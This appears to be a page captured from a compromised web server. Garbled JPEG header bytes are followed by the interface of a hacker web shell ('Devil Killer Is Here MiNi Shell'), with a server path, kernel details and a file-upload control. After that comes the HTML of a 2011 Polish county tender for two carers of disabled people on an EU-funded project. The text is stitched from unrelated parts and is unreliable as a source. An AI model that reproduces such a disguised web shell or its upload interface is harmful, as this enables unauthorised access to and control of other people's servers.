JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110211/50155-N-2011.html

<p class="kh_header"><b>Lębork: Zatrudnienie dwóch opiekunów osób niepełnosprawnych (2 części) 
w ramach projektu pn. Aktywność zawodowa na zdrowie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VI Rynek otwarty dla wszystkich, 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, 6.1.1 Wsparcie osób pozostających bez zatrudnienia 
na regionalnym rynku pracy</b><br>
<b>Numer ogłoszenia: 50155 - 2011; data zamieszczenia: 11.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zatrudnienie dwóch opiekunów osób niepełnosprawnych (2 części) 
w ramach projektu pn. Aktywność zawodowa na zdrowie  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VI Rynek otwarty dla wszystkich, 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, 6.1.1 Wsparcie osób pozostających bez zatrudnienia 
na regionalnym rynku pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Zatrudnienie dwóch opiekunów osób niepełnosprawnych- 2 części

Część I Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych
Część II - Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie- zatrudnienie opiekuna osób niepełnosprawnych (w szczególności nad osobami z możliwymi zaburzeniami psychicznymi)

w ramach projektu pn.: Aktywność zawodowa na zdrowie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VI Rynek otwarty dla wszystkich, 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie,  6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy. 
Grupę docelową stanowią osoby niepełnosprawne pozostające bez zatrudnienia (w tym osoby zarejestrowane jako bezrobotne), posiadające lekki, umiarkowany lub znaczny stopień niepełnosprawności. Ponadto muszą być mieszkańcami powiatu lęborskiego.
Głównym celem projektu będzie zaktywizowanie grupy 20 osób niepełnosprawnych (12 kobiet; 8 mężczyzn) zgodnie z indywidualnymi predyspozycjami z uwzględnieniem panujących tendencji na lokalnym rynku pracy.

CZĘŚĆ I - Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych

Przedmiotem zamówienia jest grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych, dla którego określono następujące obowiązki:
1.	Przeprowadzenie rekrutacji uczestników projektu:
- promocja projektu służąca zrekrutowaniu uczestników
- uczestnictwo i współpraca z pozostałymi członkami Komisji Rekrutacyjnej
- rozmowa kwalifikacyjna z potencjalnym kandydatem
- sporządzanie dokumentacji związanej z przeprowadzoną rozmową kwalifikacyjną
- przygotowanie raportu z przeprowadzonej rekrutacji
2.	Grupowa i indywidualna opieka nad osobami niepełnosprawnymi przez cały okres trwania projektu
- pomoc uczestnikom projektu przy przygotowywaniu wszelkiego rodzaju dokumentacji związanej 
z realizacją zadań projektowych
- bieżące informowanie uczestników o planowanych działaniach oraz ewentualnych zmianach, które mogą wystąpić przy realizacji zadań projektowych
3.	Sporządzanie ankiet w celach analitycznych 
4.	Sporządzenie ewaluacji ex-post projektu
5.	Wykonywanie innych czynności określonych odrębnie przez strony w przygotowaniu, wdrażaniu i realizacji wymienionego Projektu

Wymagania niezbędne dotyczące osoby uczestniczącej w wykonaniu zamówienia:
1.	posiadanie kwalifikacji pracownika socjalnego wykazane ustawą z dnia 12 marca 2004 roku o pomocy społecznej, z uwzględnieniem zmian wprowadzonych ustawą z dnia 16 lutego 2007 roku o zmianie ustawy o pomocy społecznej, 
2.	posiadanie minimum rocznego doświadczenia w pracy z osobami niepełnosprawnymi w zakresie aktywizacji zawodowej i społecznej osób niepełnosprawnych, 
3.	znajomość ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych
Osoba uczestnicząca w wykonaniu zamówienia musi spełniać warunek trzeci oraz co najmniej jeden z warunków określonych w punkcie pierwszym i drugim.


CZĘŚĆ II - Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych (w szczególności nad osobami z możliwymi zaburzeniami psychicznymi)

Przedmiotem zamówienia jest grupowa i indywidualna opieka nad osobami niepełnosprawnymi - zatrudnienie opiekuna osób niepełnosprawnych, dla którego określono następujące obowiązki:
1.	Przeprowadzenie rekrutacji uczestników projektu:
- promocja projektu służąca zrekrutowaniu uczestników
- uczestnictwo i współpraca z pozostałymi członkami Komisji Rekrutacyjnej
- rozmowa kwalifikacyjna z potencjalnym kandydatem
- sporządzanie dokumentacji związanej z przeprowadzoną rozmową kwalifikacyjną
- przygotowanie raportu z przeprowadzonej rekrutacji
2.	Grupowa i indywidualna opieka nad osobami niepełnosprawnymi przez cały okres trwania projektu - w szczególności nad osobami z możliwymi zaburzeniami psychicznymi
- pomoc uczestnikom projektu przy przygotowywaniu wszelkiego rodzaju dokumentacji związanej z realizacją zadań projektowych
- bieżące informowanie uczestników o planowanych działaniach oraz ewentualnych zmianach, które mogą wystąpić przy realizacji zadań projektowych
3.	Sporządzanie ankiet w celach analitycznych 
4.	Sporządzenie ewaluacji ex-post projektu
5.	Wykonywanie innych czynności określonych odrębnie przez strony w przygotowaniu, wdrażaniu i realizacji wymienionego Projektu
Wymagania niezbędne dotyczące osoby uczestniczącej w wykonaniu zamówienia:

1.	posiadanie kwalifikacji pracownika socjalnego wykazane ustawą z dnia 12 marca 2004 roku o pomocy społecznej, z uwzględnieniem zmian wprowadzonych ustawą z dnia 16 lutego 2007 roku o zmianie ustawy o pomocy społecznej, 
2.	posiadanie minimum rocznego doświadczenia w pracy z osobami niepełnosprawnymi w zakresie aktywizacji zawodowej i społecznej osób niepełnosprawnych, 
3.	posiadanie uprawnień osoby świadczącej specjalistyczne usługi dla osób z zaburzeniami psychicznymi zgodnie z §3 Rozporządzenia Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych 
4.	znajomość ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych
Osoba uczestnicząca w wykonaniu zamówienia musi spełniać warunki trzeci i czwarty oraz co najmniej jeden z warunków określonych w punkcie pierwszym i drugim.


Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego) - dotyczy dwóch części zamówienia:
a)	Wykonywanie zadań odbywać się będzie w siedzibie Zamawiającego przez czas trwania umowy, tj. od dnia podpisania umowy do 31.10.2011 r. w uzgodnione z Zamawiającym dni powszednie od poniedziałku do piątku. Terminy i godziny wykonywania zadań dostosowane będą do najbardziej pożądanych przez odbiorców. 
b)	Wykonawcy przyjmujący obowiązki opiekunów osób niepełnosprawnych będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia.
c)	Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia.
d)	Wykonawca zobowiązany jest do ewidencjonowania wykonywanych usług w sposób wskazany przez koordynatora projektu Aktywność zawodowa na zdrowie oraz prowadzenia dokumentacji realizacji przedmiotu zamówienia zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl.
e)	Wykonawca wraz z rachunkiem/fakturą przedstawi Zamawiającemu comiesięczną prawidłowo wypełnioną kartę czasu pracy.
f)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia.
g)	Zamawiający zastrzega sobie prawo kontroli sposobu realizacji obowiązków Wykonawcy wynikających z SIWZ oraz umowy.
h)	Za wykonanie przedmiotu zamówienia w części I i II zamieszczonego w Opisie przedmiotu zamówienia Wykonawcy przysługuje wynagrodzenie ryczałtowe, które będzie wypłacane za każdy miesiąc kalendarzowy świadczonych usług..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.35.00.00-1, 85.31.12.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (oświadczenie z art. 22 ust. 1).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (oświadczenie z art. 22 ust. 1).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy Części I: 

 Na potwierdzenie tego warunku Wykonawcy zobowiązani są załączyć do oferty:

a)	Warunek powyższy zostanie spełniony, jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich wykształcenia, doświadczenia, kwalifikacji zawodowych niezbędnych do wykonania zamówienia wraz z informacją o podstawie dysponowania tą osobą. 
b)	Oświadczenie, że posiadają uprawnienia pracownika socjalnego posiadając kwalifikacje wykazane ustawą z dnia 12 marca 2004r. o pomocy społecznej, z uwzględnieniem zmian wprowadzonych ustawą z dnia 16 lutego 2007r. o zmianie ust. o pomocy społecznej lub Oświadczenie, że posiadają minimum roczne doświadczenie w pracy z osobami niepełnosprawnymi w zakresie aktywizacji zawodowej i społecznej osób niepełnosprawnych
c)	Oświadczenie, że posiada znajomość ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych

dotyczy części II: 

Na potwierdzenie tego warunku Wykonawcy zobowiązani są załączyć do oferty:

a)	Warunek powyższy zostanie spełniony, jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich wykształcenia, doświadczenia, kwalifikacji zawodowych niezbędnych do wykonania zamówienia wraz z informacją o podstawie dysponowania tą osobą. 
b)	Oświadczenie, że posiadają uprawnienia osoby świadczącej specjalistyczne usługi dla osób z zaburzeniami psychicznymi zgodnie z §3 Rozporządzenia Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych 
c)	Oświadczenie, że posiadają uprawnienia pracownika socjalnego posiadając kwalifikacje wykazane ustawą z dnia 12 marca 2004r. o pomocy społecznej, z uwzględnieniem zmian wprowadzonych ustawą z dnia 16 lutego 2007r. o zmianie ust. o pomocy społecznej lub Oświadczenie, że posiadają minimum roczne doświadczenie w pracy z osobami niepełnosprawnymi w zakresie aktywizacji zawodowej i społecznej osób niepełnosprawnych 
d)	Oświadczenie, że posiada znajomość ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych

Jeżeli Wykonawca wykazując spełnianie warunków posiadania wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolnościach finansowych, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków winien udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (oświadczenie z art. 22 ust. 1).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu wykonania przedmiotu zamówienia,
b)	zmiany harmonogramu,
c)	zmiany osób wskazanych do pełnienia usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zamawiającego pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2011 godzina 10:00, miejsce: w Biurze Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Aktywność zawodowa na zdrowie  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VI Rynek otwarty dla wszystkich, 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych, dla którego określono następujące obowiązki:
1.	Przeprowadzenie rekrutacji uczestników projektu:
- promocja projektu służąca zrekrutowaniu uczestników
- uczestnictwo i współpraca z pozostałymi członkami Komisji Rekrutacyjnej
- rozmowa kwalifikacyjna z potencjalnym kandydatem
- sporządzanie dokumentacji związanej z przeprowadzoną rozmową kwalifikacyjną
- przygotowanie raportu z przeprowadzonej rekrutacji
2.	Grupowa i indywidualna opieka nad osobami niepełnosprawnymi przez cały okres trwania projektu
- pomoc uczestnikom projektu przy przygotowywaniu wszelkiego rodzaju dokumentacji związanej 
z realizacją zadań projektowych
- bieżące informowanie uczestników o planowanych działaniach oraz ewentualnych zmianach, które mogą wystąpić przy realizacji zadań projektowych
3.	Sporządzanie ankiet w celach analitycznych 
4.	Sporządzenie ewaluacji ex-post projektu
5.	Wykonywanie innych czynności określonych odrębnie przez strony w przygotowaniu, wdrażaniu i realizacji wymienionego Projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.35.00.00-1, 85.31.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupowa i indywidualna opieka nad uczestnikami projektu Aktywność zawodowa na zdrowie - zatrudnienie opiekuna osób niepełnosprawnych (w szczególności nad osobami z możliwymi zaburzeniami psychicznymi).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest grupowa i indywidualna opieka nad osobami niepełnosprawnymi - zatrudnienie opiekuna osób niepełnosprawnych, dla którego określono następujące obowiązki:
1.	Przeprowadzenie rekrutacji uczestników projektu:
- promocja projektu służąca zrekrutowaniu uczestników
- uczestnictwo i współpraca z pozostałymi członkami Komisji Rekrutacyjnej
- rozmowa kwalifikacyjna z potencjalnym kandydatem
- sporządzanie dokumentacji związanej z przeprowadzoną rozmową kwalifikacyjną
- przygotowanie raportu z przeprowadzonej rekrutacji
2.	Grupowa i indywidualna opieka nad osobami niepełnosprawnymi przez cały okres trwania projektu - w szczególności nad osobami z możliwymi zaburzeniami psychicznymi
